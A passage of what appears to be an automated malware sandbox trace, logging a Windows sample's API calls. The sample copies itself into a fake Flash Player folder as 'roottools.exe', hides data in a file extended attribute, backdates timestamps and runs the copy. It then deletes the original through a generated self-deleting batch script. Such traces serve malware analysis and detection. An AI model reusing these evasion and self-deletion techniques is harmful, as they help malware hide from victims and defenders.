pszDest=0x18f5d0, cchDest=3, pszFmt="%02X", arglist=0x18f5ac | out: pszDest="89") returned 2 [0328.080] wvnsprintfW (in: pszDest=0x27dfaf0, cchDest=523, pszFmt="\\\\.\\pipe\\%s", arglist=0x18f828 | out: pszDest="\\\\.\\pipe\\D3B6C4DE8CF79A854B549EE232F08C89") returned 41 [0328.080] CreateFileW (lpFileName="\\\\.\\pipe\\D3B6C4DE8CF79A854B549EE232F08C89" (normalized: "\\device\\namedpipe\\d3b6c4de8cf79a854b549ee232f08c89"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x4177e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0328.080] WriteFile (in: hFile=0x148, lpBuffer=0x18f8a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x18f89c, lpOverlapped=0x0 | out: lpBuffer=0x18f8a4*, lpNumberOfBytesWritten=0x18f89c*=0x4, lpOverlapped=0x0) returned 1 [0328.081] ReadFile (in: hFile=0x148, lpBuffer=0x18f8a0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x18f89c, lpOverlapped=0x0 | out: lpBuffer=0x18f8a0*, lpNumberOfBytesRead=0x18f89c*=0x4, lpOverlapped=0x0) returned 1 [0328.081] ReadFile (in: hFile=0x148, lpBuffer=0x2760590, nNumberOfBytesToRead=0x2fe, lpNumberOfBytesRead=0x18f89c, lpOverlapped=0x0 | out: lpBuffer=0x2760590*, lpNumberOfBytesRead=0x18f89c*=0x2fe, lpOverlapped=0x0) returned 1 [0328.081] CloseHandle (hObject=0x148) returned 1 [0328.081] wvnsprintfW (in: pszDest=0x18f0a0, cchDest=3, pszFmt="%02X", arglist=0x18f07c | out: pszDest="D3") returned 2 [0328.081] wvnsprintfW (in: pszDest=0x18f0a0, cchDest=3, pszFmt="%02X", arglist=0x18f07c | out: pszDest="B6") returned 2 [0328.082] wvnsprintfW (in: pszDest=0x18f0a0, cchDest=3, pszFmt="%02X", arglist=0x18f07c | out: pszDest="C4") returned 2 [0328.082] wvnsprintfW (in: pszDest=0x18f0a0, cchDest=3, pszFmt="%02X", arglist=0x18f07c | out: pszDest="DE") returned 2 [0328.082] wvnsprintfW (in: pszDest=0x18f0a0, cchDest=3, pszFmt="%02X", arglist=0x18f07c | out: pszDest="8C") returned 2 [0328.082] wvnsprintfW (in: pszDest=0x18f0a0, cchDest=3, pszFmt="%02X", arglist=0x18f07c | out: pszDest="F7") returned 2 [0328.082] wvnsprintfW (in: pszDest=0x18f0a0, cchDest=3, pszFmt="%02X", arglist=0x18f07c | out: pszDest="9A") returned 2 [0328.082] wvnsprintfW (in: pszDest=0x18f0a0, cchDest=3, pszFmt="%02X", arglist=0x18f07c | out: pszDest="85") returned 2 [0328.082] wvnsprintfW (in: pszDest=0x18f0a0, cchDest=3, pszFmt="%02X", arglist=0x18f07c | out: pszDest="4B") returned 2 [0328.082] wvnsprintfW (in: pszDest=0x18f0a0, cchDest=3, pszFmt="%02X", arglist=0x18f07c | out: pszDest="54") returned 2 [0328.082] wvnsprintfW (in: pszDest=0x18f0a0, cchDest=3, pszFmt="%02X", arglist=0x18f07c | out: pszDest="9E") returned 2 [0328.082] wvnsprintfW (in: pszDest=0x18f0a0, cchDest=3, pszFmt="%02X", arglist=0x18f07c | out: pszDest="E2") returned 2 [0328.082] wvnsprintfW (in: pszDest=0x18f0a0, cchDest=3, pszFmt="%02X", arglist=0x18f07c | out: pszDest="32") returned 2 [0328.082] wvnsprintfW (in: pszDest=0x18f0a0, cchDest=3, pszFmt="%02X", arglist=0x18f07c | out: pszDest="F0") returned 2 [0328.082] wvnsprintfW (in: pszDest=0x18f0a0, cchDest=3, pszFmt="%02X", arglist=0x18f07c | out: pszDest="8C") returned 2 [0328.082] wvnsprintfW (in: pszDest=0x18f0a0, cchDest=3, pszFmt="%02X", arglist=0x18f07c | out: pszDest="89") returned 2 [0328.082] wvnsprintfW (in: pszDest=0x27dfaf0, cchDest=523, pszFmt="\\\\.\\pipe\\%s", arglist=0x18f2fc | out: pszDest="\\\\.\\pipe\\D3B6C4DE8CF79A854B549EE232F08C89") returned 41 [0328.082] CreateFileW (lpFileName="\\\\.\\pipe\\D3B6C4DE8CF79A854B549EE232F08C89" (normalized: "\\device\\namedpipe\\d3b6c4de8cf79a854b549ee232f08c89"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x4177e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0328.082] WriteFile (in: hFile=0x148, lpBuffer=0x18f378*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x18f370, lpOverlapped=0x0 | out: lpBuffer=0x18f378*, lpNumberOfBytesWritten=0x18f370*=0x4, lpOverlapped=0x0) returned 1 [0328.106] ReadFile (in: hFile=0x148, lpBuffer=0x18f374, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x18f370, lpOverlapped=0x0 | out: lpBuffer=0x18f374*, lpNumberOfBytesRead=0x18f370*=0x4, lpOverlapped=0x0) returned 1 [0328.108] ReadFile (in: hFile=0x148, lpBuffer=0x27dff18, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x18f370, lpOverlapped=0x0 | out: lpBuffer=0x27dff18*, lpNumberOfBytesRead=0x18f370*=0x4, lpOverlapped=0x0) returned 1 [0328.110] CloseHandle (hObject=0x148) returned 1 [0328.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f416, cbMultiByte=76, lpWideCharStr=0x18f698, cchWideChar=260 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 76 [0328.113] PathCombineW (in: pszDest=0x18fd80, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" [0328.114] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0328.115] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x18f244 | out: lpFileSize=0x18f244*=196608) returned 1 [0328.116] VirtualAlloc (lpAddress=0x0, dwSize=0x30000, flAllocationType=0x3000, flProtect=0x4) returned 0x3d0000 [0328.118] ReadFile (in: hFile=0x148, lpBuffer=0x3d0000, nNumberOfBytesToRead=0x30000, lpNumberOfBytesRead=0x18f254, lpOverlapped=0x0 | out: lpBuffer=0x3d0000*, lpNumberOfBytesRead=0x18f254*=0x30000, lpOverlapped=0x0) returned 1 [0328.121] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0328.121] WriteFile (in: hFile=0x150, lpBuffer=0x3d0000*, nNumberOfBytesToWrite=0x30000, lpNumberOfBytesWritten=0x18f24c, lpOverlapped=0x0 | out: lpBuffer=0x3d0000*, lpNumberOfBytesWritten=0x18f24c*=0x30000, lpOverlapped=0x0) returned 1 [0328.123] CloseHandle (hObject=0x150) returned 1 [0328.124] VirtualFree (lpAddress=0x3d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0328.125] CloseHandle (hObject=0x148) returned 1 [0328.125] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77cb0000 [0328.125] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", NtPathName=0x18f228, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0328.125] NtCreateFile (in: FileHandle=0x18f20c, DesiredAccess=0x10, ObjectAttributes=0x18f230*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x18f220, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x40, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x18f20c*=0x148, IoStatusBlock=0x18f220*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0328.125] NtSetEaFile (FileHandle=0x148, IoStatusBlock=0x18f220, EaBuffer=0x27dfaf0*(NextEntryOffset=0x0, Flags=0x0, EaNameLength=0x4, EaValueLength=0x2fe, EaName="data", EaValue=0x27dfafd*), EaBufferSize=0x310) returned 0x0 [0328.126] NtClose (Handle=0x148) returned 0x0 [0328.126] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x148 [0328.126] GetFileTime (in: hFile=0x148, lpCreationTime=0x18f38c, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x18f38c*(dwLowDateTime=0x2335d4a0, dwHighDateTime=0x1d2f180), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0328.126] CloseHandle (hObject=0x148) returned 1 [0328.126] GetSystemTime (in: lpSystemTime=0x18f130 | out: lpSystemTime=0x18f130*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x38, wSecond=0x3a, wMilliseconds=0x39d)) [0328.126] SystemTimeToFileTime (in: lpSystemTime=0x18f130, lpFileTime=0x18f140 | out: lpFileTime=0x18f140) returned 1 [0328.126] PathIsDirectoryW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 0 [0328.126] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0328.126] SetFileTime (hFile=0x148, lpCreationTime=0x18f364, lpLastAccessTime=0x18f364, lpLastWriteTime=0x18f364) returned 1 [0328.127] CloseHandle (hObject=0x148) returned 1 [0328.127] PathRemoveFileSpecW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0328.127] PathIsDirectoryW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0328.127] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0328.127] wvnsprintfW (in: pszDest=0x27dfaf0, cchDest=516, pszFmt="\"%s\"", arglist=0x18f88c | out: pszDest="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"") returned 112 [0328.127] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpStartupInfo=0x18f824*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f868 | out: lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"", lpProcessInformation=0x18f868*(hProcess=0x150, hThread=0x148, dwProcessId=0x7e8, dwThreadId=0x7b4)) returned 1 [0328.141] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="7F") returned 2 [0328.141] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="0E") returned 2 [0328.141] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="6C") returned 2 [0328.141] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="A1") returned 2 [0328.141] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="75") returned 2 [0328.141] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="D0") returned 2 [0328.141] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="AD") returned 2 [0328.141] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="DE") returned 2 [0328.141] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="F9") returned 2 [0328.141] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="23") returned 2 [0328.141] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="FD") returned 2 [0328.141] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="A0") returned 2 [0328.141] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="09") returned 2 [0328.141] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="EF") returned 2 [0328.141] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="D2") returned 2 [0328.141] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="11") returned 2 [0328.141] CreateEventW (lpEventAttributes=0x4177e4, bManualReset=1, bInitialState=0, lpName="7F0E6CA175D0ADDEF923FDA009EFD211") returned 0x158 [0328.141] WaitForMultipleObjects (nCount=0x2, lpHandles=0x18f8bc*=0x158, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0338.001] CloseHandle (hObject=0x158) returned 1 [0338.001] CloseHandle (hObject=0x148) returned 1 [0338.001] CloseHandle (hObject=0x150) returned 1 [0338.001] ReleaseMutex (hMutex=0x14c) returned 1 [0338.001] CloseHandle (hObject=0x14c) returned 1 [0338.001] CharToOemW (in: pSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", pDst=0x18f7a0 | out: pDst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe") returned 1 [0338.001] wvnsprintfA (in: pszDest=0x18f534, cchDest=620, pszFmt=":d\r\ndel /F /Q \"%s\"\r\nif exist \"%s\" goto d", arglist=0x18f52c | out: pszDest=":d\r\ndel /F /Q \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe\"\r\nif exist \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe\" goto d") returned 140 [0338.001] GetTempPathW (in: nBufferLength=0xf6, lpBuffer=0x18eb9c | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25 [0338.001] wvnsprintfW (in: pszDest=0x18eda4, cchDest=260, pszFmt="%s%08x.%s", arglist=0x18eb88 | out: pszDest="upd9dba1b78.bat") returned 15 [0338.001] PathCombineW (in: pszDest=0x18f2dc, pszDir="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", pszFile="upd9dba1b78.bat" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat" [0338.001] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upd9dba1b78.bat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0338.002] CloseHandle (hObject=0x14c) returned 1 [0338.002] CharToOemW (in: pSrc="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat", pDst=0x18f1d8 | out: pDst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat") returned 1 [0338.002] wvnsprintfA (in: pszDest=0x27dfb48, cchDest=540, pszFmt="@echo off\r\n%s\r\ndel /F \"%s\"\r\n", arglist=0x18efb0 | out: pszDest="@echo off\r\n:d\r\ndel /F /Q \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe\"\r\nif exist \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe\" goto d\r\ndel /F \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat\"\r\n") returned 216 [0338.002] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upd9dba1b78.bat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0338.002] WriteFile (in: hFile=0x14c, lpBuffer=0x27dfb48*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x18efa8, lpOverlapped=0x0 | out: lpBuffer=0x27dfb48*, lpNumberOfBytesWritten=0x18efa8*=0xd8, lpOverlapped=0x0) returned 1 [0338.002] CloseHandle (hObject=0x14c) returned 1 [0338.003] wvnsprintfW (in: pszDest=0x18efbc, cchDest=270, pszFmt="/c \"%s\"", arglist=0x18efb4 | out: pszDest="/c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat\"") returned 57 [0338.003] GetEnvironmentVariableW (in: lpName="ComSpec", lpBuffer=0x18f2dc, nSize=0x104 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0338.003] wvnsprintfW (in: pszDest=0x27dfb48, cchDest=519, pszFmt="\"%s\" %s", arglist=0x18ef90 | out: pszDest="\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat\"") returned 87 [0338.003] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f4e4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ef70 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat\"", lpProcessInformation=0x18ef70*(hProcess=0x150, hThread=0x14c, dwProcessId=0x6a4, dwThreadId=0x464)) returned 1 [0338.009] CloseHandle (hObject=0x14c) returned 1 [0338.009] CloseHandle (hObject=0x150) returned 1 [0338.009] ExitProcess (uExitCode=0x0) [0338.011] UnhookWindowsHookEx (hhk=0x200e9) returned 1 [0338.011] CloseHandle (hObject=0x7c) returned 1 [0338.011] CloseHandle (hObject=0x80) returned 1 [0338.011] VirtualFree (lpAddress=0x1ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0338.012] HeapDestroy (hHeap=0x1eb0000) returned 1 Thread: id = 307 os_tid = 0x7d8 Process: id = "21" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x62c38000" os_pid = "0x57c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "19" os_parent_pid = "0x358" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0002ec69" [0xc000000f] Region: id = 3641 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3642 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3643 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3644 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 3645 start_va = 0x77ad0000 end_va = 0x77c78fff entry_point = 0x77ad0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3646 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3647 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3648 start_va = 0xffe70000 end_va = 0xffecefff entry_point = 0xffe70000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 3649 start_va = 0x7feffdf0000 end_va = 0x7feffdf0fff entry_point = 0x7feffdf0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3650 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3651 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3652 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3653 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 3654 start_va = 0x779b0000 end_va = 0x77acefff entry_point = 0x779b0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3655 start_va = 0x7fefdad0000 end_va = 0x7fefdb3afff entry_point = 0x7fefdad0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3656 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3657 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3658 start_va = 0x778b0000 end_va = 0x779a9fff entry_point = 0x778b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3659 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3660 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3661 start_va = 0x7fef4040000 end_va = 0x7fef4055fff entry_point = 0x7fef4040000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 3662 start_va = 0x7fef6370000 end_va = 0x7fef6396fff entry_point = 0x7fef6370000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 3663 start_va = 0x7fef63a0000 end_va = 0x7fef6481fff entry_point = 0x7fef63a0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 3664 start_va = 0x7fef6610000 end_va = 0x7fef6695fff entry_point = 0x7fef6610000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3665 start_va = 0x7fefdfa0000 end_va = 0x7fefe03efff entry_point = 0x7fefdfa0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3666 start_va = 0x7fefe380000 end_va = 0x7fefe45afff entry_point = 0x7fefe380000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3667 start_va = 0x7fefe4c0000 end_va = 0x7fefe4defff entry_point = 0x7fefe4c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3668 start_va = 0x7fefe4e0000 end_va = 0x7fefe52cfff entry_point = 0x7fefe4e0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3669 start_va = 0x7fefe530000 end_va = 0x7fefe53dfff entry_point = 0x7fefe530000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3670 start_va = 0x7fefe540000 end_va = 0x7fefe742fff entry_point = 0x7fefe540000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3671 start_va = 0x7fefe750000 end_va = 0x7fefe818fff entry_point = 0x7fefe750000 region_type = mapped_file name = 